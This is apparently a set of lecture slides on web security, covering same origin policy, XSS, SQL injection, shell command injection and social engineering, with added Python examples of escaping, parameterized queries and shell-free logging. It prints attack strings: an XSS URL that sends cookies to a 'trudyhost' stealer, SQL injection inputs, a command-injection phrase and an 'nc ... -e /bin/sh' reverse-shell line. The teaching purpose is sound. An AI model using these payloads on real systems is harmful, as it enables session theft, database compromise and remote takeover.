Web security.


Web security

Objectives
- Understand the complexity of Web infrastructure and current trends of Web threats
- Understand the mechanisms and defenses of major Web attacks: XSS, SQL injection and shell attacks

Introduction
- Average user spends 16 h/month online (32 h/month in U.S.) [1]
- People spend much time interacting with the Web and Web applications (apps)
- Their (lack of) security has a major impact
- Interaction is via the Web browser (figure omitted; source: [2], [3])

Why Web Security: a Real Business Problem
- > 60% of total attack attempts observed on the Net are against Web applications
- > 80% of vulnerabilities discovered are in Web apps
- Independent security audit
- Regulatory compliance
* SANS/TippingPoint, based on March-August 2009 data

Web Browser Workflow (figure omitted; source: [4])

HyperText Transfer Protocol (HTTP)
- Browsers use HTTP to fetch Web content
- Request/response based protocol
- Stateless
- HTTP requests [4]: for a webpage, script, image, file, etc.; usually expose info about the client and browser [5]
- HTTP response [4]: a file (HTML, image, etc.); can redirect to another webpage

Web Applications
- Big trend: software as a (Web-based) service
  - Online banking, shopping, government, etc.
  - Cloud computing
- Applications hosted on Web servers
- Written in a mixture of PHP, Java, Perl, Python, C, ASP
- Security is rarely the main concern
  - Poorly written scripts with inadequate input validation
  - Sensitive data stored in world-readable files

Typical Web Application Design
- Runs on a Web server or application server
- Takes input from Web users (via Web server)
- Interacts with back-end databases and third parties
- Prepares and outputs results for users (via Web server)
- Dynamically generated HTML pages
  - Contain content from many different sources, often including regular users (blogs, social networks, photo-sharing websites…)
  - Web advertisements, usually third party
  - A webpage can have content coming from 10-20 different domains

Two Sides of Web Security
- Web browser (front end)
  - Can be attacked by any website it visits
  - Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data
- Web application (back end)
  - Runs at the website: banks, online merchants, blogs, Google Apps, etc.
  - Written in JavaScript, PHP, ASP, JSP, Ruby, …
  - Many potential bugs: XSS, SQL injection, XSRF
  - Attacks lead to stolen credit cards, defaced sites, etc.

Basics – Browser Security
- Web browser stores info, e.g., cookies, user credentials, etc.
- Same origin policy (SOP): only code running on "the same" website as other code can access the latter's methods/properties [11]
- Origin is determined by application protocol, domain name, and port number
- SOP is critical to browser security

Basics – Browser Security
Same origin policy outcomes (URL, outcome, reason):

  URL                                        Outcome   Reason
  http://www.example.com/dir/page.html       Success   Same protocol and host
  http://www.example.com/dir2/other.html     Success   Same protocol and host
  http://www.example.com:81/dir/other.html   Failure   Different port
  https://www.example.com/dir/other.html     Failure   Different protocol
  http://en.example.com/dir/other.html       Failure   Different host
  http://example.com/dir/other.html          Failure   Different host
  http://v2.www.example.com/dir/other.html   Failure   Different host
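The table above as executable logic. This is an added example, not code from the slides: it assumes the compared document is the first row's URL, http://www.example.com/dir/page.html, and goes one step past the table by folding the scheme's default port into the origin, so an explicit :80 still counts as the same origin.

```python
from urllib.parse import urlsplit

# Browsers fold the scheme's default port into the origin, so
# http://www.example.com:80/ and http://www.example.com/ are one origin.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) triple that the same origin policy compares."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def same_origin(url_a, url_b):
    """True when both URLs share scheme, host and port; path and query are ignored."""
    return origin(url_a) == origin(url_b)


def sop_outcome(document_url, target_url):
    """Classify an access from document_url to target_url the way the slide's table does."""
    a, b = origin(document_url), origin(target_url)
    if a == b:
        return ("Success", "Same protocol and host")
    if a[0] != b[0]:
        return ("Failure", "Different protocol")
    if a[1] != b[1]:
        return ("Failure", "Different host")
    return ("Failure", "Different port")


# Constructed sample: the slide's document URL (assumed) plus its listed targets,
# with one extra row (explicit :80) that the slide's table does not cover.
DOCUMENT = "http://www.example.com/dir/page.html"
TARGETS = [
    "http://www.example.com/dir2/other.html",
    "http://www.example.com:81/dir/other.html",
    "https://www.example.com/dir/other.html",
    "http://en.example.com/dir/other.html",
    "http://example.com/dir/other.html",
    "http://v2.www.example.com/dir/other.html",
    "http://www.example.com:80/dir/other.html",
]

if __name__ == "__main__":
    for target in TARGETS:
        outcome, reason = sop_outcome(DOCUMENT, target)
        print(f"{target:45} {outcome:8} {reason}")
```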

Chicago Tribune Home Page (screenshot slide)

How Are Legitimate Web Sites Compromised?
- SQL injection attacks
- Malicious advertisements
  - Many Web sites today display advertisements hosted by third-party advertising sites
  - The volume of ads published automatically makes detection difficult
  - Random appearances further compound the detection problem
- Search engine result redirection
- Attacks on the backend virtual hosting companies
- Cross-site scripting (XSS) attacks
- Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)

We need application layer protection as well!

Attack Types

Denial-of-Service (DoS)
- Denial of Service (DoS) attack: attacker causes the web server to be unavailable.
- How the attack is performed:
  - Attacker frequently requests many pages from your web site.
  - Distributed DoS (DDoS): DoS using lots of computers.
  - Your server cannot handle this many requests at a time, so it turns into a smoldering pile of goo (or just becomes very slow).
- Problems that this attack can cause:
  - Users cannot get to your site.
  - Online store's server crashes -> store loses potential revenue.
  - Server may crash and lose or corrupt important data.
  - All the bandwidth used by the DoSers may cost you $$$.

Packet sniffing
- packet sniffing: listening to traffic sent on a network.
- Many internet protocols (http, aim, email) are insecure.
- If an attacker is on the same local network (LAN) as you, he can:
  - read your email/IMs as you send them
  - see what web sites you are viewing
  - grab your password as it's being sent to the server
- Solutions:
  - Use secure protocols (ssh, https)
  - Encryption
  - Don't let creeps on your LAN/wifi

Password cracking
- password cracking: guessing the passwords of privileged users of your system.
- How the attack is performed:
  - brute force attack: attacker uses software that sequentially tries every possible password.
  - dictionary attack: attacker uses software that sequentially tries passwords based on words in a dictionary: every word in the dictionary, combinations of words, numbers, etc.
- What you can do about it:
  - Force users to have secure passwords.
  - Block an IP address from logging in after N failed attempts.

Phishing/social engineering
- phishing: masqueraded mails or web sites.
- social engineering: attempts to manipulate users, such as fraudulently acquiring passwords or credit card numbers.
- Problems: if trusted users of your system are tricked into giving out their personal information, attackers can use this to log in as those users and compromise your system.

Privilege escalation
- privilege escalation: attacker becomes able to run code on your server as a privileged user.
- Example: perhaps normal users aren't able to directly query your database. But an attacker may find a flaw in your security letting him run as an administrator and perform the query.
- Once you're running as root, you own the server. You can do anything you want!

Cross-site scripting (XSS)
- cross-site scripting: causing one person's script code to be executed when a user browses to another site.
- Example: visit google.com, but evil.com's JavaScript runs.
- How the attack is performed:
  - Attacker finds insecure code on the target site.
  - Attacker uses the hole to inject JavaScript into the page.
  - User visits the page and the malicious script code runs in the user's browser.

Cross-site scripting (XSS)
- Attacker goal: get their code into the victim's browser
- XSS forces a website visitor to execute malicious code in his/her browser
- Accounts for roughly 80% of all documented security vulnerabilities

XSS Risks
- XSS abuses rendering engines or plug-ins
- Steal browser cookies
- Steal session info for a replay attack
- Malware or bot installation
- Redirect or phishing attempt

XSS Detection
- A client usually is not supposed to send scripts to servers
- If the server receives <SCRIPT>… (or its hex-encoded equivalent) in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred
- A sanitized script could look like &lt;SCRIPT>…
- Any user input must be preprocessed before it is used inside HTML

XSS Example 2
- Trudy sends Bob a link to the following URL, which will take him to a personalized page:
  http://host/personalizedpage.php?username=<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>
- A page is returned that contains the malicious script, and Bob's browser executes the script, causing his session cookie to be sent to Trudy
- Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious
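The detection rule and the sanitization from the two XSS slides above, applied to this example's URL. This is an added example, not code from the slides: `personalizedpage.php` is modelled by a one-line template, the URL is the one on the slide, and the hex-encoded variant is constructed here with `urllib.parse.quote`.

```python
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# Stand-in for the slide's personalizedpage.php: one template, one parameter.
TEMPLATE = "<html><body><h1>Welcome, {username}!</h1></body></html>"

# Matches an opening script tag in any letter case.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

# The payload from the slide, plain and hex (percent) encoded; constructed sample input.
PAYLOAD = ("<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'"
           "+document.cookie</script>")
ATTACK_URL = "http://host/personalizedpage.php?username=" + PAYLOAD
ATTACK_URL_HEX = "http://host/personalizedpage.php?username=" + quote(PAYLOAD, safe="")


def username_from_url(url):
    """Extract the username parameter as the server sees it. parse_qs undoes
    percent-encoding, so a hex-encoded <script> arrives as the same text
    ('+' in the plain URL decodes to a space, as in form decoding)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("username", [""])[0]


def render_vulnerable(username):
    """Pastes raw input into the page: a <script> in the parameter becomes real script."""
    return TEMPLATE.replace("{username}", username)


def render_escaped(username):
    """Encodes <, >, &, and quotes before insertion so the browser shows them as text."""
    return TEMPLATE.replace("{username}", html.escape(username, quote=True))


def reflected_script(request_value, response_body):
    """The detection rule from the slide: an incoming <script> that reappears
    verbatim in the outgoing page means the input was not sanitized."""
    return bool(SCRIPT_TAG.search(request_value)) and request_value in response_body


def analyze(url):
    """Return (vulnerable_page_reflects, escaped_page_reflects) for the username in url."""
    name = username_from_url(url)
    return (reflected_script(name, render_vulnerable(name)),
            reflected_script(name, render_escaped(name)))


if __name__ == "__main__":
    for url in (ATTACK_URL, ATTACK_URL_HEX):
        print(url[:60] + "...", analyze(url))
    print(render_escaped(username_from_url(ATTACK_URL_HEX)))
```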

SQL Injection
- Malicious SQL statements run on a database and thus attack the server
- Causing undesired SQL queries to be run on your database
- Often caused when untrusted input is pasted into a SQL query
  PHP: "SELECT * FROM Users WHERE name='$name';";
- Specify a user name of: x' OR 'a'='a
  SELECT * FROM Users WHERE name='x' OR 'a'='a';

SQL Injection Example
- Trudy accesses Bob's website, which does not validate input on its sign-in form
- The site runs a SQL statement like the following:
  select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe';
- Set username to: ' or '1'='1
  select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1';
- Effect: picks any row where the username is blank and the password matches, or any row at all, because the OR condition is always true
- Add "limit 1" to pick the first row
- Second example: in the password field, she types as her password: X" OR "x"="x
- This manipulates the server into running the following SQL command:
  SELECT * FROM ACCOUNTS WHERE username = "USER_NAME" AND password="X" OR "x"="x";
- Selects all account information

SQL Injection Detection
- Input validation on any outgoing SQL statements from the web server to the database server
- Filter apostrophes, semicolons, percent symbols, hyphens, underscores, …
- Any character that has a special meaning must be escaped, e.g., convert ' into \'
  - Only works for string inputs
  - Different databases have different rules for escaping
- Check the data type (e.g., make sure it's an integer)
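The minibbtable_users login from the SQL injection example, run against an in-memory SQLite table, with the string-concatenated query beside a parameterized one. This is an added example, not MiniBB's code: the table rows are constructed, and because SQLite has no md5() function the MD5 digest is computed in Python and inserted as a hex string, which is what the slide's md5('...') call evaluates to.

```python
import hashlib
import sqlite3

SELECT = "select username, user_password from minibbtable_users "


def md5(text):
    """Hex MD5 of the password, standing in for the slide's md5('...') inside SQL."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    """In-memory copy of the slide's minibbtable_users table with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("create table minibbtable_users (username text, user_password text)")
    db.executemany("insert into minibbtable_users values (?, ?)",
                   [("johndoe", md5("johnspassword")), ("alice", md5("s3cret"))])
    return db


def vulnerable_query_text(username, password, limit_one=False):
    """The statement the concatenating code actually sends. A username of
    ' or '1'='1 closes the quote, and AND binds tighter than OR, so the WHERE
    clause is true for every row; 'limit 1' then picks just the first of them."""
    sql = SELECT + f"where user_password = '{md5(password)}' and username='{username}'"
    return sql + (" limit 1" if limit_one else "")


def login_vulnerable(db, username, password, limit_one=False):
    """String concatenation as on the slide: returns the usernames the query matches."""
    return [row[0] for row in db.execute(vulnerable_query_text(username, password, limit_one))]


def login_parameterized(db, username, password):
    """Bound parameters: values travel separately from the SQL text, so quotes and
    keywords in the username are compared literally against the column."""
    sql = SELECT + "where user_password = ? and username = ?"
    return [row[0] for row in db.execute(sql, (md5(password), username))]


if __name__ == "__main__":
    db = make_db()
    injected = "' or '1'='1"
    print(vulnerable_query_text(injected, "anyrandompassword"))
    print("vulnerable:    ", login_vulnerable(db, injected, "anyrandompassword"))
    print("parameterized: ", login_parameterized(db, injected, "anyrandompassword"))
```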

Shell Attacks: control an actual machine like a Web server

Shell Attacks
- Inject commands into scripts that use Linux utilities, e.g., with ";" as the command separator in UNIX/Linux
- CGI programs like Perl can use command-line programs (e.g., grep, ls)
- Unsanitized input passed as arguments can lead to command execution

Shell Attacks Demo
- The search engine in the MiniBB webserver executes:
  system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");
- Put the phrase as: >/dev/null; id; echo randomdata
  - Hides the user ID
  - Stores random data in the logs to evade detection
- We can even get a remote shell: >/dev/null; nc cal 5000 -e /bin/sh
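The MiniBB logging call from the demo, rebuilt to show why the phrase breaks it and how to log the same phrase without a shell interpreting it. This is an added example, not MiniBB's code: the vulnerable command is reconstructed as a string only and never executed, the log goes to a temporary file instead of /tmp/searchlogs, and the phrase is the one shown on the slide.

```python
import os
import shlex
import subprocess
import tempfile

# Payload from the slide, as constructed sample input.
PHRASE = ">/dev/null; id; echo randomdata"


def vulnerable_command_text(user, phrase):
    """The MiniBB pattern, rebuilt as a string and never executed here: once a shell
    parses it, '>' becomes a redirection and each ';' starts a new command."""
    return f"echo {user} {phrase} >>/tmp/searchlogs"


def quoted_command_text(user, phrase):
    """If a shell command line is unavoidable, shlex.quote wraps each value in single
    quotes so the metacharacters inside it lose their meaning."""
    return f"echo {shlex.quote(user)} {shlex.quote(phrase)} >>/tmp/searchlogs"


def log_search_safe(user, phrase, logfile):
    """Preferred fix: no shell at all. The inputs are argv elements of echo and the
    append redirection is done by Python, so the phrase is logged as plain text."""
    with open(logfile, "a") as out:
        subprocess.run(["echo", user, phrase], stdout=out, check=True)


def demo(user="bob", phrase=PHRASE):
    """Log one search with the safe routine and return what landed in the log file."""
    with tempfile.TemporaryDirectory() as tmp:
        logfile = os.path.join(tmp, "searchlogs")
        log_search_safe(user, phrase, logfile)
        with open(logfile) as f:
            return f.read()


if __name__ == "__main__":
    print("shell would run:", vulnerable_command_text("bob", PHRASE))
    print("quoted form:    ", quoted_command_text("bob", PHRASE))
    print("logged as text: ", demo().rstrip())
```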

Defense Approaches
- Web firewall/IDS
  - ModSecurity for Apache
  - Commercial: SecureSphere from Imperva
- Static code analysis
  - Open source: Nikto
  - Commercial: Acunetix Web Vulnerability Scanner, N-Stalker
- Education on good coding
- HTML encoding on input (server-side)
- Input validation/filtering

Getting Onto a User's Computer (source: Web Based Attacks, Symantec 2009)

Automatic Attack Exposure
- Techniques used to deliver malware from websites to a user's computer
- Exposure: browsing a website
- No user interaction is required
- Executable content is automatically downloaded

“Click Jacking”

Social Engineering
- People are tricked into performing actions they would not otherwise want to perform
Source: Web Based Attacks, Symantec 2009

Types of Social Engineering Attacks
- Fake codec
- Malicious peer-to-peer (P2P) files
- Malicious advertisements
- Fake scanner web page
- Blog spam
- Other attack vectors

Fake Codec
- User is prompted to install a missing codec
- The codec is actually malware code, usually a trojan horse

Malicious Peer-to-Peer (P2P) Files
- Malware authors bind content into popular applications
- Files are named after celebrities and popular bands
- Uploaded to popular P2P sites where they are downloaded by unsuspecting users
- Openly available how-to materials on the internet detail how to build and distribute malware
- Pay-per-install malware

Fake Scanner Web Page
- Create a web site or product that misrepresents the truth
- JavaScript pop-ups notifying of a false need to install operating system updates
- Tools that claim to scan for and remove adult images, etc.
Source: Web Based Attacks, Symantec 2009

Blog Spam
- Alluring links posted on blogs
- Links embedded in blog comments
- Direct users to sites that leverage social engineering tricks or browser exploits to spread malware

User input attacks
- Bypassing client-side input restrictions and validation:
  - maxlength limits on an input text field
  - choices not listed in a select box
  - hidden input fields
  - modifying or disabling client-side JavaScript validation code

Guessing files/directories
- security through obscurity: many reachable files/resources are hidden only by the fact that there is no link to them.
- Try common files/folders/commands to see what happens: /etc/passwd, /etc/shadow, cat, ls, grep
- Guess file names based on others:
  page11.php --> page12.php
  loginfailure.jsp --> loginsuccess.jsp
  accounts/fred.html --> accounts/sue.html
- brute force / web spiders
- port scanners

Other attacks
- Attacking GET parameters
- Attacking hidden input fields
- Attacking cookies
- Cross-site request forgery (CSRF)
- ...

Other Attack Vectors
- Spam: emails contain links directing people to drive-by download, fake scanner/codec, and malware sites
- Pirated software sites: pirated versions of software are bundled with, or comprised solely of, trojan horses

Thinking like an attacker: Finding vulnerabilities

Panning for gold
- View Source, and look for:
  - HTML comments
  - script code
  - other sensitive information in code: IP/email addresses, SQL queries, hidden fields, ...
- Watch HTTP requests/responses
- Look for hidden pages, files, parameters to target
- Error messages sent to your browser by the app:
  200: OK
  400: Invalid request
  403: Forbidden
  404: File not found
  500: Internal server error

Input forms
- Forms let users pass parameters to the web server.
- Parameters are passed using GET or POST requests.
  - GET: parameters are contained in the request URL.
    http://www.google.com?q=Stephen+Colbert&lang=en
  - POST: parameters are contained in the HTTP packet header.
    Harder for the user to see, but no more secure than GET.
- Forms provide a rich attack ground...

Form validation
- validation: examining form parameters to make sure they are acceptable before/as they are submitted.
  - nonempty, alphabetical, numeric, length, ...
  - client-side: HTML/JS checks values before the request is sent.
  - server-side: JSP/Ruby/PHP/etc. checks values received.
- Some validation is performed by restricting the user's choices.
  - select boxes
  - input text boxes with the maxlength attribute
  - key event listeners that erase certain key presses

How to Protect Yourself
- Update and patch software
  - Get the latest OS, browser, and application patches
  - Browser plug-in updates are often forgotten
- Endpoint protection software
  - Anti-virus software for signature-based detection and behavioral monitoring
- Update protection software subscription
  - Could miss 70,000 new unique virus variants for one week
- Be suspicious
  - Avoid things that seem too good to be true
  - Use safe search functionality in browsers
- Adopt a strong password policy

Sources
Chapter 7: Web Development & Design Foundations with HTML5, 7th Edition.